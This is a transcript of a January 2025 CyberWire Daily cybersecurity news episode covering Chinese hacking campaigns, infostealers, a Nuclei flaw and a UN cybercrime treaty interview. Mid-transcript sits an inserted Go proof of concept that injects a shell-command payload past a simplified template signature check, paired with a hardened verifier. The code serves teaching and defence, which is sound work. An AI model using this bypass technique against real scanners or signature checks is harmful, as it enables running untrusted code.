CyberWire Daily - China’s shadow over U.S. telecom networks.
Episode Date: January 6, 2025

New reports shed light on both Volt and Salt Typhoons. Tenable updates faulty Nessus Agents and resumes plugin updates. A new infostealer campaign targets gamers on Discord. A fake version of a popular browser extension has been discovered stealing login credentials and conducting phishing attacks. ESET warns Windows 10 users of a potential “security fiasco.” A vulnerability in Nuclei allows attackers to bypass template signature verification and inject malicious code. An Indiana dental practice pays a $350,000 settlement over an alleged ransomware coverup. Tim Starks, Senior Reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty and his outlook for 2025. Farewell to a visionary leader.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Tim Starks, Senior Reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty and his outlook for 2025. Read Tim’s article on the UN cybercrime treaty here.

Selected Reading
The US’s Worst Fears of Chinese Hacking Are on Display in Guam (Bloomberg)
How Chinese Hackers Graduated From Clumsy Corporate Thieves to Military Weapons (Wall Street Journal)
China protests US sanctions for its alleged role in hacking, complains of foreign hacker attacks (AP News)
Tenable Disables Nessus Agents Over Faulty Updates (SecurityWeek)
New Infostealer Campaign Uses Discord Videogame Lure (Infosecurity Magazine)
Beware! Malicious EditThisCookie Chrome Extension Steals Login Credentials (Cyber Security News)
Windows 10 users urged to upgrade to avoid "security fiasco" (Bleeping Computer)
Nuclei flaw lets malicious templates bypass signature verification (Bleeping Computer)
Dental Practice Pays State in Alleged Data Breach 'Cover Up' (GovInfo Security)
Tenable CEO Amit Yoran Dead at 54 (SecurityWeek)

Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here’s our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
You're listening to the CyberWire Network, powered by N2K.
Air Transat presents two friends traveling in Europe for the first time and feeling some pretty big emotions.
This coffee is so good. How do they make it so rich and tasty?
Those paintings we saw today weren't prints. They were the actual paintings.
I have never seen tomatoes like this.
How are they so red?
With flight deals starting at just $589,
it's time for you to see what Europe has to offer.
Don't worry.
You can handle it.
Visit airtransat.com for details.
Conditions apply.
AirTransat.
Travel moves us.
Hey, everybody.
Dave here.
Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try Delete.me.
I have to say, Delete.me is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash N2K, code N2K.
A new report sheds light on both Volt and Salt Typhoons.
Tenable updates faulty Nessus agents and resumes plugin updates.
A new InfoStealer campaign targets gamers on Discord.
A fake version of a popular browser extension has been discovered stealing login credentials and conducting phishing attacks.
ESET warns Windows 10 users of a potential security fiasco.
A vulnerability in Nuclei allows attackers to bypass template signature verification and inject malicious code.
An Indiana dental practice pays a $350,000 settlement over an alleged ransomware cover-up.
Tim Starks, senior reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty along with his outlook for 2025.
And a fond farewell to a visionary leader.
It's Monday, January 6th, 2025. I'm Dave Bittner, and this is your CyberWire Intel Briefing.
Happy Monday, and thank you for joining us here today. It is great to have you with us.
Two major reports published this past weekend shed light on China's escalating hacking campaigns.
A Bloomberg article focused on Volt Typhoon, the Chinese group behind the 2022 cyberattack on Guam's power authority, the GPA.
This hack, tied to over 100 intrusions, raised concerns about China's capability to disrupt
U.S. military operations in Guam, a strategic hub in the Indo-Pacific.
Experts see this as part of a potential strategy to disable U.S. responses in a Taiwan conflict.
The GPA incident is particularly alarming since it serves the U.S. Navy,
highlighting the national security stakes. The U.S. has made countering Volt Typhoon a priority,
but China has denied any involvement. Liu Pengyu, a Chinese embassy spokesperson,
dismissed the allegations as baseless smear campaigns.
A Wall Street Journal piece examined Salt Typhoon,
the Chinese hacking group that has infiltrated at least nine major U.S. telecom companies,
including AT&T, Verizon, and T-Mobile. Newly identified victims include Charter Communications,
Consolidated Communications, and Windstream. The article also revisited China's
2021 Port Houston attack, where a disguised attacker accessed a password reset server.
Notably, a cybersecurity vendor flagged the breach, but a misjudgment by the port's cybersecurity chief
led to the attack being dismissed as a false alarm right before he went to lunch at Whataburger.
These incidents illustrate China's sophisticated and targeted cyber campaigns,
with serious implications for U.S. national security.
The revelations spotlight the vulnerabilities in critical infrastructure
and the growing urgency to bolster defenses against state-sponsored cyberattacks.
Tenable temporarily disabled Nessus agent versions after discovering they went offline during plugin updates. The issue, affecting Tenable Vulnerability Management and Security Center,
led to halted updates while the company investigated. On January 2nd, Tenable released an updated version that
resolves the problem and resumed plugin updates. Organizations are advised to either update to the
latest version or downgrade to a previous version, performing a plugin reset where needed.
The root cause remains undisclosed, with potential customer impacts unclear.
Gaming enthusiasts are being warned about a new InfoStealer campaign targeting Discord users.
Scammers send unsolicited messages claiming to be game developers seeking beta testers.
Victims receive a download link and password for an installer, but instead of a game, they unknowingly install information-stealing malware like Nova Stealer, Ageo Stealer, or Hexon Stealer. These malware strains steal
credentials, Discord tokens, browser data, cryptocurrency wallet information, and more.
The scam often uses compromised accounts and credible hosting platforms, including Dropbox and Discord's own content delivery network, to appear legitimate.
Criminals leverage stolen Discord credentials to manipulate users into further scams,
expanding their reach.
To stay safe, users should maintain up-to-date anti-malware software,
verify suspicious messages through alternate channels,
and avoid downloading files from unsolicited messages.
The ultimate goal of these scams is financial theft and account compromise.
A fake version of the popular EditThisCookie browser extension
has been discovered stealing login credentials and conducting phishing attacks.
The legitimate EditThisCookie, used by millions to manage browser cookies,
was recently removed from the Chrome Web Store,
likely due to incompatibility with Google's new Manifest version 3 framework.
Cybercriminals exploited this gap, launching a fraudulent version,
EditThisCookie, with a registered trademark sign,
now downloaded over 50,000 times. Malware analyst Eric Parker revealed the extension's malicious
features, including phishing mechanisms, Facebook credential theft, and advertising scripts for
revenue. Although current versions lack cookie exfiltration, future updates could escalate risks through Chrome's automatic updates.
Users should audit their extensions, avoid suspicious add-ons, and enable Chrome's enhanced safe browsing.
This incident underscores ongoing challenges in Google's Chrome Web Store security and the controversial rollout of Manifest version 3.
ESET is urging Windows 10 users to upgrade to Windows 11 or Linux before the operating system support ends on October 14, 2025.
Without free updates, Windows 10 users will face significant security risks
from newly discovered vulnerabilities.
ESET's Thorsten Urbanski warns that delaying the upgrade could lead to a security fiasco.
Windows 10 remains the most widely used OS globally,
with 63% of Windows users compared to 34% on Windows 11.
Many users hesitate to upgrade due to missing features,
performance issues, or hardware incompatibilities
such as the Trusted Platform Module requirement. Businesses and consumers relying on older devices
face limited options. Upgrade to Windows 11, switch to another OS, or pay costly extended
security updates. These updates, priced at up to $427 over three years, highlight the urgency to transition.
A vulnerability in Nuclei, the open-source vulnerability scanner, allows attackers to
bypass template signature verification and inject malicious code. Nuclei uses YAML templates to scan
websites for vulnerabilities and executes commands locally to extend functionality.
Templates are protected by a digest hash for verification.
The flaw exploited differences between Go's regex-based signature verification
and YAML parser behavior with line breaks.
Attackers could inject malicious content by manipulating how
\r is processed, bypassing verification but executing when parsed. Additionally, Nuclei's
limited digest line verification in a template allowed attackers to add additional malicious
payloads in subsequent lines. Wiz researchers disclosed the issue to ProjectDiscovery on
August 14th of last year. It was fixed by Nuclei on September 4th. Users should update immediately
and isolate Nuclei to prevent risks.
Indiana-based West End Dental has agreed to pay $350,000
and enhance data security measures following allegations of a ransomware cover-up from 2020.
The incident, which encrypted patient records via Medusa Locker malware, only came to light during a 2022 investigation triggered by a patient complaint about missing x-rays.
West End allegedly failed to conduct a forensic investigation or notify affected individuals, violating HIPAA and state breach laws. Despite knowing its systems were
hacked, the practice falsely claimed the data loss resulted from a server formatting error.
Regulators allege West End attempted to hide the breach and delayed reporting it for two years.
Under a consent order, West End must improve HIPAA compliance, notify all patients as of November 2023, and address allegations of improperly sharing patients' protected health
information online. The case highlights the growing enforcement of data privacy regulations
in healthcare.
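The Nuclei item above describes a parser differential: a Go regular expression decides where a digest line ends (only at a newline), while the YAML parser also treats a bare carriage return as a line break. The Go program below is an added example, not code from the podcast, from Nuclei, or from the Wiz write-up. It reconstructs the flawed sequence against a simplified template format (strip every digest line with a multi-line regex, check only the first digest value), shows how a payload hidden behind a \r on a second digest line passes the check yet surfaces as a new top-level key to a carriage-return-aware line splitter, and ends with a hardened check. The HMAC signing key, the exact regex, the yamlLines stand-in for the YAML scanner, the sample template and payload, and the verifyHardened rules are all assumptions for illustration and are not Nuclei's actual implementation or patch.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Stand-in signing key (assumption). Real Nuclei signs templates with an
// ECDSA key pair; an HMAC keeps this example self-contained.
var signingKey = []byte("example-key-not-a-real-secret")

// Digest-line pattern of the shape the transcript describes (assumption).
// (?m) makes ^ and $ line anchors, but in Go's RE2 a line ends only at \n,
// so a bare \r is an ordinary character that "." matches.
var reDigest = regexp.MustCompile(`(?m)^#\sdigest:\s(.+)$`)

func mac(content string) string {
	h := hmac.New(sha256.New, signingKey)
	h.Write([]byte(content))
	return hex.EncodeToString(h.Sum(nil))
}

// sign appends a digest line computed over the whitespace-trimmed body.
func sign(body string) string {
	return body + "# digest: " + mac(strings.TrimSpace(body)) + "\n"
}

// verifyVulnerable mirrors the flawed sequence: take the FIRST digest value
// the regex finds, strip EVERY digest line, then hash what is left.
func verifyVulnerable(template string) bool {
	m := reDigest.FindStringSubmatch(template)
	if m == nil {
		return false
	}
	unsigned := strings.TrimSpace(reDigest.ReplaceAllString(template, ""))
	return hmac.Equal([]byte(m[1]), []byte(mac(unsigned)))
}

// injectPayload appends a second, bogus digest line whose "value" continues,
// after a bare \r, with attacker-controlled YAML. The regex treats everything
// up to the next \n as part of that digest line and strips it before hashing.
func injectPayload(signed, payloadYAML string) string {
	return signed + "# digest: 0\r" + strings.ReplaceAll(payloadYAML, "\n", "\r") + "\n"
}

// yamlLines is a stand-in (assumption) for the YAML scanner's line handling:
// YAML 1.2 treats \r\n, \r and \n as line breaks. It is not Nuclei's YAML library.
func yamlLines(s string) []string {
	s = strings.ReplaceAll(s, "\r\n", "\n")
	s = strings.ReplaceAll(s, "\r", "\n")
	return strings.Split(strings.TrimRight(s, "\n"), "\n")
}

// topLevelKeys lists the unindented keys a line-break-aware parser would see.
func topLevelKeys(template string) []string {
	var keys []string
	for _, line := range yamlLines(template) {
		if line == "" || line[0] == ' ' || line[0] == '#' {
			continue
		}
		if i := strings.IndexByte(line, ':'); i > 0 {
			keys = append(keys, line[:i])
		}
	}
	return keys
}

// verifyHardened is a suggested hardening (assumption, not Nuclei's patch):
// refuse carriage returns so the regex and the parser can never disagree on
// where a line ends, require exactly one digest line, and require it to be last.
func verifyHardened(template string) error {
	if strings.ContainsRune(template, '\r') {
		return errors.New("carriage return in template")
	}
	loc := reDigest.FindAllStringSubmatchIndex(template, -1)
	if len(loc) != 1 {
		return fmt.Errorf("expected exactly one digest line, found %d", len(loc))
	}
	if strings.TrimRight(template[loc[0][1]:], "\n") != "" {
		return errors.New("digest line must be the last line")
	}
	got := template[loc[0][2]:loc[0][3]]
	want := mac(strings.TrimSpace(template[:loc[0][0]]))
	if !hmac.Equal([]byte(got), []byte(want)) {
		return errors.New("bad digest")
	}
	return nil
}

func main() {
	body := "id: harmless\ninfo:\n  name: harmless\n" // constructed sample template
	signed := sign(body)
	evil := injectPayload(signed, "code:\n  - engine: sh\n    source: id\n")
	fmt.Println("legit verifies:", verifyVulnerable(signed), topLevelKeys(signed))
	fmt.Println("evil verifies:", verifyVulnerable(evil), topLevelKeys(evil))
	fmt.Println("hardened on evil:", verifyHardened(evil))
}
```

Run it with go run: the legitimate template verifies and exposes only id and info; the tampered template also verifies under the regex-based check but exposes an extra code key once line breaks are interpreted the YAML way; the hardened verifier rejects it on the carriage return. The practical lesson is to normalize or reject line-ending characters before any text-based integrity check, and to make the verifier and the parser agree on what a line is.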
Coming up after the break, Tim Starks from CyberScoop joins us to discuss a new United Nations cybercrime treaty and a fond farewell to a visionary leader. Stay with us.
Do you know the status of your compliance controls right now? Like, right now? We know that real-time visibility is critical for security,
but when it comes to our GRC programs, we rely on point-in-time checks. But get this,
more than 8,000 companies like Atlassian and Quora have continuous visibility into their controls
with Vanta. Here's the gist. Vanta brings automation to evidence collection across 30
frameworks, like SOC 2 and ISO 27001. They also centralize key workflows like policies,
access reviews, and reporting, and helps you get security questionnaires done five times faster
with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com
slash cyber. That's vanta.com slash cyber for $1,000 off.
And now, a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform secures their personal devices, home networks, and connected lives.
Because when executives are compromised at home, your company is at risk.
In fact, over one-third of new members discover they've already been breached.
Protect your executives and their families 24-7, 365, with Black Cloak. Learn more at blackcloak.io.
It is always my pleasure to welcome to the show Tim Starks.
He is a senior reporter at CyberScoop.
Tim, thanks for joining us.
Good to be here in the new year.
I want to touch on a story that you wrote for CyberScoop here. This is about the UN adopting a cybercrime treaty that is not without controversy here. Can you unpack what's going on for us, Tim?
by Russia. So if you were starting to start off skeptical about what they might want to do with
the cybercrime treaty, that's some ground. The other countries that were in favor of it were
countries that had a reputation for being repressive or authoritarian. So it finally
came to a head on December 24th because everybody wants this for Christmas Eve. They're thinking,
I like the cybercrime treaty. There's no minute like the last minute.
The United Nations simply, at the last minute, decided to do something with this.
And I'll talk about what's troubling about it for people, but I'll just say that for our story,
since this came out last week, we focused on what comes next. So we can talk about that in a second, but the parts of it that are controversial is there are a bunch of ways that this could be implemented or interpreted by countries that have those kinds of repressive backgrounds to abuse human rights, journalists, lots of things. And one of the examples is that the requirement for cooperation amongst the treaty
signatories is triggered by, in one case, what is the penalty for the crime? What is the length of
the penalty of the crime? And if it's a long enough penalty, then you're obligated to cooperate.
That's vague enough that if you're, you know, I think that it was David Kaye, the former UN special rapporteur, I don't actually know how to say that word.
On human rights, he said, you know, it's a crime in Russia to criticize the military.
So the potential for harm with something like that is very deep.
And that's just one example of what makes it controversial.
There are some people who will speak in defense of it.
But the United States is really a reluctant part of what's going on here.
Help me understand the process of something like this going through the various machinations with the UN.
Like, something gets proposed,
and then there's the ratification and enforcement.
And where do we stand with it now?
And at what point does something like this
actually get some teeth?
Yeah, it's probably a ways off.
During the process when it started five years ago,
the United States' opinion was the Budapest Convention,
an earlier cybercrime convention that was not a UN convention, I don't believe, had done the trick, that it was the thing that we should
use. Russia, China, some other countries didn't like that convention, so they wanted to start
their own with the UN. The United States said, hmm, well, we can protest and sit it out, or we
can look at the math and see that enough countries want to do this that we'd rather be on the inside
negotiating and making things better.
Putting some provisions in there that they talk about saying nothing in this shall be
construed to harm human rights, saying that those are some defenses against it.
But it's a long, arduous, years-long process of negotiating.
You know, an earlier committee just in August voted on it.
That was sort of the definitive, okay, this is going to happen.
And the United States was uncertain whether they were going to vote for it
and decided ultimately to do so,
hoping that they could have an impact on the implementation side.
Again, reading the math and going,
we're probably not going to, this is going to probably happen with or without us.
We need to make sure it happens with us.
So the next steps are that 40 nations, as set by the rules of this particular treaty,
as I understand it, I think that there's a variable on how many nations must ratify for
it to enter into force. It's 40 in this case. The people I spoke to, I didn't actually mention this
in the story, so this is exclusive for Cyber Wire listeners. Most of the people I spoke to think
it's going to happen, that there will be 40 nations. What's unclear is whether the United States will be one of them.
I think it's going to be difficult for it to happen in the United States.
Then it enters into force, and then they start getting into implementation and oversight.
And that's many, many years down the line.
Just to give you a sense, I think it was four years before the United States approved the
Senate and the President were on board with the Budapest Convention.
These things can take a long time.
And this requires approval.
Is it two-thirds approval from the Senate, I believe?
Yes, exactly.
So not easy, especially in today's Senate.
It's not easy in any Senate.
It's not easy in this Senate.
It's going to be, what is it, 51-49 or something like that?
It's a pretty close margin coming up in January.
And then you have President Trump vacillates back and forth on how he feels about certain kinds of international alliances.
But he does tend to be in that camp of, I'd rather not be bound by what the rest of the world wants to do.
He seems to have a reflexive
resistance to that kind of thing. Um, so, you know, I suppose the right person gets in his ear.
Um, you know, if he thinks that, that this will make Putin happy, maybe, you know, maybe he'll
be on board, but then you still have to get through the Senate. And I can't imagine great
many senators liking this. We already have seen an indication from at least a
handful of Democratic senators that they think this is really bad. So I think it's a tough road
in the United States in particular. Well, before I let you go, let's do a little pivot here. And
since this is the beginning of the year and it is the time when we do these sorts of things,
what's your outlook for 2025? And anything strike you as being noteworthy as we
enter the coming year? I mean, certainly, you know, one of the top stories I'm going to be
watching, you know, one of my beat focuses is policymaking. And the fact that there's a new
president who can be erratic in terms of what he supports and what he believes and what he does is going to
make that a very interesting development. I reported in the fall about some of the personnel
that he was potentially going to be bringing in, either because those people wanted to be in or
because they were people who just made sense for him to bring in. And there weren't a lot of people
that you would, and this is a quote from one of
the people who was a supporter saying, these weren't a bunch of, they aren't a bunch of MAGA
radicals. So there, you know, in the previous term of administration, there was that, there was the
control, if you will, of cyber pros kind of keeping their head down, but also doing policy work that
wasn't controversial, at least until the end when Christopher Krebs ran afoul of the president on
election lies. So it'd be fascinating to see what he does. I mean, I'll give an example of why
the kind of thing that I find interesting. A lot of people in Trump's circle or who were
Trump supporters or Trump-oriented people on cyber say that he's going to curtail regulations.
But if you look at the Republican National RNC platform, it said we need minimum security standards
for critical infrastructure,
which is what this past administration
was doing.
So policymaking-wise,
it's going to be really fascinating
to watch what happens.
On the threat side,
this is the part that's always
the most unpredictable.
And it's one of the things
that makes the job never boring.
You just never know what day
somebody's going to use
some kind of strange vector to attack somebody
you didn't expect to get attacked.
I don't think anybody, while we could have worried
about the state of telecommunications security
coming into 2024, I don't think we would have said,
oh yeah, we're going to end 2024 with the biggest hack of that sector ever.
So that's always hard to predict.
On the spyware side, that's also going to be really fascinating.
That's another thing I cover a lot.
You know, there's been some progress in lots of ways in the fight against that.
There was the Facebook WhatsApp meta ruling against NSO Group.
There have been some changes made by this Biden administration
that seem to have isolated
or harmed some of these
worst-case providers.
And there's the Polish examination
of what's going on there,
what had gone on in their past.
There are a lot of things
that you could point to and say,
this is promising,
but they also have a way of bouncing back.
Like a lot of threats,
you think that you've got them down
and you might not.
And that's not me denigrating any specific company.
That's just me saying that the misuse of spyware seems like it's been here for a while and it's going to stay.
I'll be curious to see how much the waves lap in and lap out,
and whether they recede to a certain point and stay receded.
That'll be another thing I'll be thinking about a lot in the new year. Yeah. All right. Well, thank you again for
joining us. Wishing you all the best this new year. Tim Starks is senior reporter at CyberScoop.
Great to catch up with you, Tim. Definitely. Thanks, Dave.
And finally, cybersecurity leader Tenable
has announced the heartbreaking passing of its chairman and CEO, Amit Yoran, at the age of 54, following a courageous battle with cancer.
A pillar in the cybersecurity world, Yoran was admired for his leadership and vision, having guided Tenable since 2016.
Yoran's career was marked by significant contributions, including roles at RSA Security, NetWitness, which he founded, and Symantec. He also served as National Cybersecurity
Director at the U.S. Department of Homeland Security, leaving a lasting legacy in public
and private sectors. Following his medical leave in December, CFO Steve Vintz and COO Mark Thurmond were named
interim co-CEOs, ensuring stability during this transition. Art Coviello, an industry veteran,
will chair the board. Tenable honors Yoran's impact and assures stakeholders of its ability
to meet financial expectations, reflecting the resilience he instilled in the company.
The cybersecurity community mourns the loss of a true visionary and leader.
And that's the CyberWire. For links to all of today's stories, check out our Daily Briefing
at thecyberwire.com.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app.
Please also fill out the survey in the show notes or send an email to cyberwire at n2k.com. We're privileged that N2K Cyberwire is
part of the daily routine of the most influential leaders and operators in the public and private
sector, from the Fortune 500 to many of the world's preeminent intelligence and law enforcement
agencies. This episode was produced by Liz Stokes. Our mixer is Trey Hester, with original music and
sound design by Elliot Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella
is our president. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening.
We'll see you back here tomorrow.